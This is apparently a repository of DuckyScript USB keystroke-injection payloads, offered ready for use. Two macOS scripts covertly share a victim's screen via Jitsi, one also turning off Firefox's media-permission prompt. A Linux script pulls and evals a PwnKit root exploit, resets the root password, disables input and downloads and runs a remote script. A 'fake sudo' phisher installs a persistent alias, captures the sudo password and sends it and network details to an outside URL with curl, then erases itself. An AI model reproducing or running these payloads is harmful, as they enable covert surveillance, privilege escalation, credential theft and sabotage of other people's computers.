├── MacOS_Chrome_ScreenShare.txt ├── MacOS_Firefox_ScreenShare.txt ├── PwnKit_Cred_Changer.txt ├── README.md └── fake-sudo-exfil ├── README.md ├── payload.txt └── sudo-phishing.sh /MacOS_Chrome_ScreenShare.txt: -------------------------------------------------------------------------------- 1 | REM Title: ScreenShare MacOS Chrome 2 | REM Author: Skicka 2022 3 | REM Description: Script to share a victim's screen via Chrome on MacOS 4 | REM Target: MacOS (Google Chrome) 5 | REM Props: Hak5, HakCat 6 | REM Version: 1.0 7 | REM Category: Exfil 8 | 9 | REM You must set up a Jitsi session first & paste the URL over the example 10 | 11 | DELAY 3000 12 | GUI SPACE 13 | DELAY 100 14 | STRING terminal 15 | ENTER 16 | DELAY 2000 17 | STRING open https://meet.jit.si/EXAMPLE -a Google\ Chrome.app 18 | DELAY 1000 19 | ENTER 20 | DELAY 4000 21 | STRING victim 22 | ENTER 23 | DELAY 1000 24 | STRING D 25 | DELAY 1000 26 | TAB 27 | DELAY 1000 28 | ENTER 29 | -------------------------------------------------------------------------------- /MacOS_Firefox_ScreenShare.txt: -------------------------------------------------------------------------------- 1 | REM Title: ScreenShare MacOS Firefox 2 | REM Author: Skicka 2022 3 | REM Description: Script to share a victim's screen via Firefox on MacOS 4 | REM Target: MacOS (Firefox) 5 | REM Props: Hak5, HakCat 6 | REM Version: 1.0 7 | REM Category: Exfil 8 | 9 | REM You must set up a Jitsi session first & paste the URL over the example 10 | 11 | DELAY 3000 12 | GUI SPACE 13 | DELAY 100 14 | STRING terminal 15 | ENTER 16 | DELAY 2000 17 | STRING open about:config -a Firefox.app 18 | DELAY 500 19 | ENTER 20 | DELAY 1500 21 | ENTER 22 | DELAY 500 23 | STRING media.navigator.permission.disabled 24 | DELAY 500 25 | TAB 26 | TAB 27 | ENTER 28 | GUI N 29 | DELAY 1500 30 | STRING https://meet.jit.si/EXAMPLE 31 | DELAY 100 32 | ENTER 33 | DELAY 1000 34 | STRING ATTACKER 35 | DELAY 1000 36 | ENTER 37 | DELAY 2000 38 | STRING D 39 | REM It's done, the rest is optional 40 | DELAY 2000 41 | GUI TAB 42 | DELAY 100 43 | STRING curl parrot.live 44 | DELAY 100 45 | ENTER 46 | -------------------------------------------------------------------------------- /PwnKit_Cred_Changer.txt: -------------------------------------------------------------------------------- 1 | REM Title: PwnKit Cred Changer 2 | REM Author: Alex Lynd 3 | REM Description: Changes root creds using the PwnKit exploit, disables keyboard / mouse, delivers a devastating rickroll payload. 4 | REM Target: Linux (Bash) 5 | REM Props: Hak5, HakCat 6 | REM Version: 1.0 7 | REM Category: Prank 8 | 9 | CTRL ALT T 10 | DELAY 1000 11 | 12 | REM disable keyboard 13 | STRING xinput float 10 14 | ENTER 15 | 16 | REM disable mouse 17 | STRING xinput float 12 18 | ENTER 19 | 20 | REM run PwnKit 21 | STRING eval "$(curl -s https://raw.githubusercontent.com/berdav/CVE-2021-4034/main/cve-2021-4034.sh)" 22 | ENTER 23 | DELAY 1000 24 | 25 | REM change root password 26 | STRING passwd 27 | ENTER 28 | STRING meowmeow123 29 | ENTER 30 | DELAY 100 31 | STRING meowmeow123 32 | ENTER 33 | DELAY 300 34 | 35 | REM jack up volume 36 | STRING amixer -D pulse sset Master unmute 37 | ENTER 38 | REM STRING amixer -D pulse sset Master 100%+ 39 | ENTER 40 | 41 | REM download annoying payload 42 | STRING wget https://gist.githubusercontent.com/AlexLynd/2f8081f1940934e19a5a450ca358d142/raw/b6d4bfe05cb73f8140872448da54fb1824c4d627/linux-color-flasher.sh 43 | ENTER 44 | DELAY 500 45 | STRING chmod +x linux-color-flasher.sh 46 | ENTER 47 | STRING ./linux-color-flasher.sh & 48 | ENTER 49 | DELAY 500 50 | STRING espeak "you've been hacked loser, its time to get funky" 51 | ENTER 52 | DELAY 1000 53 | STRING firefox "https://www.youtube.com/watch?v=dQw4w9WgXcQ" 54 | ENTER 55 | DELAY 3000 56 | SPACE 57 | DELAY 1000 58 | STRING F 59 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ScriptKitty Payloads 2 | Welcome to the official ScriptKitty payload repository! [](https://github.com/HakCat-Tech/RubberNugget) is a project that lets you easily deploy DuckyScript payloads from a WiFi Nugget, using the hardware interface or through our USB Nugget WebApp. 3 | 4 | ### Payloads 5 | - **PwnKit_Cred_Changer**: Uses the PwnKit exploit to change root creds on a Linux machine, disables user input, and delivers a devastating rickroll. 6 | 7 | - **ScreenShare MacOS Chrome**: Script to share a victim's screen via Chrome on MacOS 8 | 9 | - **ScreenShare MacOS Firefox**: Script to share a victim's screen via Firefox on MacOS 10 | 11 | -------------------------------------------------------------------------------- /fake-sudo-exfil/README.md: -------------------------------------------------------------------------------- 1 | # Fake sudo 2 | 3 | - Title: Fake sudo 4 | - Author: TW-D 5 | - Version: 1.1 6 | - Target: Linux 7 | - Category: Phishing 8 | 9 | ## Description 10 | 11 | 1) Copies the "sudo" command spoofing program to the user's home directory. 12 | 2) Defines a new persistent "sudo" alias with the file "~/.bash_aliases". 13 | 3) When the user "sudoer" executes the command "sudo" in a terminal, the spoofing program : 14 | - __By default__ retrieves the username and password and writes them to "/tmp/.sudo_password". 15 | - __But__ this behavior can be changed in line 26 of the "sudo-phishing.sh" file. 16 | 4) The spoofing program deletes the "sudo" alias. Then it deletes itself. 17 | 18 | ## Configuration 19 | Coming soon! 20 | -------------------------------------------------------------------------------- /fake-sudo-exfil/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Fake-sudo 4 | # 5 | # Description: 6 | # This program creates a fake "sudo" 7 | # command by defining an persistent alias. 8 | # 9 | # Author: TW-D 10 | # Version: 1.1 11 | # Category: Phishing 12 | # Target: Linux 13 | # Attackmodes: HID and STORAGE 14 | = 15 | # TESTED ON 16 | # =============== 17 | # Ubuntu 20.04.4 LTS x86_64 (Xfce) 18 | 19 | 20 | LED R 21 | 22 | DELAY 7000 23 | CTRL ALT T 24 | DELAY 7000 25 | 26 | LED B 27 | 28 | STRING cd /media/$USER/*/Linux/exfil/ 29 | ENTER 30 | DELAY 1500 31 | 32 | STRING cp ./sudo-phishing.sh ~/.sudo_phishing.sh 33 | ENTER 34 | DELAY 1500 35 | 36 | LED C 37 | 38 | STRING chmod +x ~/.sudo_phishing.sh 39 | ENTER 40 | DELAY 1500 41 | 42 | STRING printf \"\\nalias sudo='~/.sudo_phishing.sh'\\n\" >> ~/.bash_aliases 43 | ENTER 44 | DELAY 1500 45 | 46 | LED Y 47 | 48 | STRING exit 49 | ENTER 50 | DELAY 1500 51 | 52 | LED G 53 | -------------------------------------------------------------------------------- /fake-sudo-exfil/sudo-phishing.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Fake-sudo 4 | # 5 | # This program imitates the behavior 6 | # of the "sudo" command. 7 | # 8 | 9 | if [ -z "${SUDO_PROMPT}" ]; then 10 | readonly INPUT_MESSAGE="[sudo] password for ${USER}: " 11 | else 12 | readonly INPUT_MESSAGE="${SUDO_PROMPT}" 13 | fi 14 | 15 | readonly MAXIMUM_ATTEMPTS=3 16 | readonly ERROR_MESSAGE="sudo: ${MAXIMUM_ATTEMPTS} incorrect password attempts" 17 | 18 | attempts() { 19 | /bin/echo -n "${INPUT_MESSAGE}" 20 | read -r -s sudo_password 21 | /bin/echo "" 22 | if ( /bin/echo "${sudo_password}" | /usr/bin/sudo -S /bin/true > /dev/null 2>&1 ); then 23 | ## 24 | # 25 | ## 26 | /bin/echo "${USER}:${sudo_password}" > /tmp/.sudo_password 27 | curl https://url.here -A "$(cat /tmp/.sudo_password)" 28 | curl https://url.here -A "$(ifconfig | tr -d '\n')" 29 | ## 30 | # 31 | ## 32 | /bin/rm ~/.sudo_phishing.sh 33 | /usr/bin/head -n -1 ~/.bash_aliases > ~/.bash_aliases_bak 34 | /bin/mv ~/.bash_aliases_bak ~/.bash_aliases 35 | /bin/echo "${sudo_password}" | /usr/bin/sudo -S "${@}" 36 | $BASH 37 | exit 0 38 | fi 39 | } 40 | 41 | if ( (/usr/bin/sudo -n /bin/true > /dev/null 2>&1) || [ "${#}" -eq 0 ] ); then 42 | /usr/bin/sudo "${@}" 43 | else 44 | for ((iterator=1; iterator <= MAXIMUM_ATTEMPTS; iterator++)); do 45 | attempts "${@}" 46 | done 47 | /bin/echo "${ERROR_MESSAGE}" 48 | fi 49 | --------------------------------------------------------------------------------